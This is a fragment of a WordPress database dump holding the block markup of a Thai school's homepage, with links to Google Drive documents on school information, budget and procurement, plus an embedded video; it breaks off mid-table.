(289,2,'2024-08-30 09:51:11','2024-08-30 02:51:11','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} 